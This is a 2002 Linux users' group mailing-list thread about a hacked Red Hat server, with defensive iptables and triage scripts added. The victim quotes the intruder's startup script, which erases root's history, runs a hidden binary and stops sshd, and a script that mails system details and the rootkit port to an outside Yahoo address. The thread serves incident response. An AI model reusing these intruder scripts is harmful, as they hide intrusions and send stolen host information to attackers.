[lug] i got hacked

Riggs, Rob RRiggs at doubleclick.net
Thu Apr 18 16:01:14 MDT 2002


Feel free to report it to the FBI, but unless this intrusion risks
substantial monetary damages (CC #'s stolen, etc.) you will just be a part
of their crime statistics report. There is nothing that requires that you
save the data, but if you do expect law enforcement to do something about
it, yank the HD and replace it with a new one.

Definitely report the hack to Yahoo! so that they can close or monitor the
email account.

-Rob

-----Original Message-----
From: Scott A. Herod [mailto:herod at interact-tv.com]
Sent: Thursday, April 18, 2002 3:54 PM
To: lug at lug.boulder.co.us
Subject: Re: [lug] i got hacked


Document the intrusion as much as possible.

Unplug the network cable.
Wipe it.
Reload everything.
Set up an iptables or ipchains firewall.
Run said firewall.
Plug the network cable back in.

Contact the FBI.  ( Scary option.  I'd be afraid they might
charge you with destruction of evidence for wiping the box.
That is if they even care to respond. )

Seriously, I have an ipchains firewall on the ppp port on my
home machine.  I see scans within 5 minutes of dialing up
my ISP.  ( I tend to run several services for other machines
on my home network but those all talk through eth0.  Nothing
but udp nameservice and auth is allowed in though my ppp
interface. )

Scott
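
Scott's dial-up policy (nothing in through the ppp link except UDP name service and auth, everything else dropped), written out as an iptables script. This is an added example, not Scott's own ipchains ruleset: it assumes the dial-up interface is ppp0 and the LAN is eth0 (both overridable through the WAN variable or by editing), and it leans on iptables connection tracking where ipchains needed explicit rules for reply packets. With IPT=echo (the default when run without --apply) it prints the rules instead of loading them, so the policy can be reviewed without root.

```shell
#!/bin/sh
# Added example, not Scott's actual firewall. Assumptions: the dial-up link
# is ppp0, the LAN (where his services live) is eth0, and this box answers
# DNS on udp/53 and ident/auth on tcp/113 for the outside world.
# IPT=echo prints the rules instead of applying them.

IPT="${IPT:-iptables}"
WAN="${WAN:-ppp0}"

# Lock down a single external interface. Anything not listed is dropped.
ppp_firewall() {
    # Default-deny first, then flush, so there is no accept-all window.
    $IPT -P INPUT DROP
    $IPT -F INPUT

    # Traffic that did not arrive over the dial-up link (loopback, the LAN
    # on eth0) is not this script's concern; Scott's services talk over eth0.
    $IPT -A INPUT ! -i "$WAN" -j ACCEPT

    # Replies to connections this box started (web, mail, DNS lookups).
    # ipchains had no state table and needed reply rules spelled out;
    # conntrack does that job here.
    $IPT -A INPUT -i "$WAN" -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT

    # The only two inbound services allowed on the ppp link:
    # UDP name service and TCP auth (ident).
    $IPT -A INPUT -i "$WAN" -p udp --dport 53 -j ACCEPT
    $IPT -A INPUT -i "$WAN" -p tcp --dport 113 -j ACCEPT

    # Log (rate-limited) what gets dropped; this is how the scans that show
    # up within minutes of dialing in become visible in syslog.
    $IPT -A INPUT -i "$WAN" -m limit --limit 5/min -j LOG --log-prefix "ppp-drop: "
    $IPT -A INPUT -i "$WAN" -j DROP
}

# Dry run: emit the rule set as text for review (runs in a subshell so the
# IPT override does not leak into the caller).
show_rules() (
    IPT=echo
    ppp_firewall
)

case "${1:-}" in
    --apply) ppp_firewall ;;   # as root, with a real iptables
    *)       show_rules ;;     # default: print, do not touch the kernel
esac
```

Run it with no arguments to print the rule set; `sh fw.sh --apply` as root loads it. After loading, scan the ppp address from outside: only udp/53 and tcp/113 should answer, and the LOG rule should show the rest in syslog. If the box should not actually serve DNS or ident to the Internet, drop those two ACCEPT lines; conntrack already lets DNS replies to the box's own lookups back in.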

j davis wrote:
> 
> I have a box at a place I do contract work about 2 days a month.
> Today I could not ssh to it, so I went on site and discovered I got
> hacked... like a dummy I didn't have tcp wrappers on or a firewall. I think
> they exploited wu-ftpd
> ...I use Red Hat 7.1 with wu-ftpd 2.6.1-20... I haven't got around to upgrading
> yet.
> anyway here is what i found in /etc/rc3.d/S52remote
> 
> #!/bin/sh
> 
> # Throw away root's shell history and make sure nothing is recorded from now on
> rm -rf /root/.bash_history
> ln -s /dev/null /root/.bash_history
> 
> # Run the intruder's binary hidden in /dev (with ./s as its argument),
> # then shut down the real sshd
> cd /dev
> ./ryz -f ./s
> /etc/rc.d/init.d/sshd stop
> cd /
> 
> # "trimite" is Romanian for "send": mail a system summary to the intruder
> /usr/bin/trimite
> 
> then here is /usr/bin/trimite
> 
> #!/bin/sh
> 
> # Collects a system profile into /tmp/info and mails it out.
> # The Romanian strings are left as found; translations are in the comments.
> echo "* Info : $(uname -a)" >> /tmp/info
> echo "* Hostname : $(hostname -f)" >> /tmp/info
> echo "* IfConfig : $(/sbin/ifconfig | grep inet)" >> /tmp/info
> echo "* Uptime : $(uptime)" >> /tmp/info
> echo "* Cpu Vendor ID : $(cat /proc/cpuinfo|grep vendor_id)" >> /tmp/info
> echo "* Cpu Model : $(cat /proc/cpuinfo|grep model)" >> /tmp/info
> echo "* Cpu Speed: $(cat /proc/cpuinfo|grep MHz)" >> /tmp/info
> echo "* Bogomips: $(cat /proc/cpuinfo|grep bogomips)" >> /tmp/info
> echo "* Spatiu Liber: $(df -h)" >> /tmp/info               # "Spatiu Liber" = "Free space"
> echo "* Ping la Yahoo: $(ping -c3 yahoo.com)" >> /tmp/info  # "Ping la Yahoo" = "Ping to Yahoo"
> echo "* Password: $(wc /etc/passwd -l)" >> /tmp/info        # counts lines in /etc/passwd
> echo "* Portul rootkitului este 25897" >> /tmp/info         # "The rootkit's port is 25897"
> cat /tmp/info | mail -s "root dupa reboot" ryz_ro at yahoo.com   # subject: "root after reboot"
> rm -f /tmp/info
> 
> So, netstat says I have something listening on 25897... what should I do?!
> Never been hacked before.... I already turned off ftp and turned on tcp
> wrappers.
> 
> Help please
> jd
> 
> 
> _______________________________________________
> Web Page:  http://lug.boulder.co.us
> Mailing List: http://lists.lug.boulder.co.us/mailman/listinfo/lug
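
A first triage pass over what jd describes (an unknown listener on 25897, a hand-written S52remote in rc3.d, binaries dropped into /dev), as an added example; it is not code from jd, Scott or Rob, and the netstat output it parses is constructed here to mirror the thread, not captured from jd's machine. The parts that touch a real system (the /proc lookup, the /dev and rc3.d sweeps, rpm -Va) only run with --live. One caveat the thread's own facts impose: the intruder's start-up script stops sshd, starts its own binary out of /dev and pipes root's history to /dev/null, so ps, netstat, ls and rpm on that disk may be trojaned too. Run the live checks from a rescue boot with the disk mounted read-only, or at least from statically linked copies brought in on clean media, and, as Rob says, keep the original disk if anyone is ever to look at it.

```shell
#!/bin/sh
# Added triage helper for a box like jd's; not code from the thread.
# Names here (ryz, S52remote, port 25897) come from the thread; the sample
# netstat output is constructed, not real output from his machine.

# Constructed `netstat -anp` output: the intruder's "ryz" listening on 25897
# and holding one connection, plus a normal named on udp/53. sshd is absent
# because the intruder's script stops it.
SAMPLE_NETSTAT='Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:25897           0.0.0.0:*               LISTEN      2417/ryz
tcp        0      0 10.0.0.5:25897          203.0.113.7:41022       ESTABLISHED 2417/ryz
udp        0      0 0.0.0.0:53              0.0.0.0:*                           531/named'

# Print "proto local-address pid program" for whatever is bound to a port.
# Reads netstat -anp style lines on stdin. UDP lines have no State column,
# so only TCP lines are required to say LISTEN.
listener_for_port() {
    awk -v port="$1" '
        $1 ~ /^(tcp|udp)/ && $4 ~ (":" port "$") && ($1 ~ /^udp/ || $6 == "LISTEN") {
            split($NF, pp, "/")            # "2417/ryz" -> pid, program name
            print $1, $4, pp[1], pp[2]
        }'
}

# /proc/PID/exe names the running binary even if it was renamed or deleted
# after start; a "(deleted)" suffix in the target is itself a red flag.
exe_for_pid() { readlink "/proc/$1/exe"; }

# /dev should hold only device nodes, directories and symlinks, and Red Hat's
# rc?.d directories only symlinks into ../init.d. A regular file in either
# (ryz and s in /dev, S52remote in rc3.d in this thread) was put there by hand.
regular_files_in() { find "$1" -xdev -type f 2>/dev/null; }

# Red Hat specific: packaged files whose MD5 no longer matches the rpm
# database (column 1 of rpm -Va shows a 5 on mismatch). rpm and its database
# can be tampered with, so an empty result means "nothing found", not "clean".
modified_package_files() {
    rpm -Va 2>/dev/null | awk '$1 ~ /5/ { print $NF }'
}

# Live run on the box (preferably from a rescue boot; see the caveats above).
triage_live() {
    port="${1:-25897}"
    echo "== process bound to port $port"
    netstat -anp 2>/dev/null | listener_for_port "$port" |
    while read -r proto addr pid prog; do
        echo "$proto $addr pid=$pid prog=$prog exe=$(exe_for_pid "$pid")"
    done
    echo "== regular files hiding in /dev"
    regular_files_in /dev
    echo "== hand-made entries in /etc/rc.d/rc3.d"
    regular_files_in /etc/rc.d/rc3.d
    echo "== packaged files whose checksum changed"
    modified_package_files
}

case "${1:-}" in
    --live) triage_live "${2:-25897}" ;;
    *)      printf '%s\n' "$SAMPLE_NETSTAT" | listener_for_port 25897 ;;
esac
```

Without arguments the script only runs the parser over the constructed sample and prints `tcp 0.0.0.0:25897 2417 ryz`; `sh triage.sh --live 25897` runs the checks against the real system. The ESTABLISHED line in the sample is there to show that the filter reports the listening socket, not every connection that happens to use that local port.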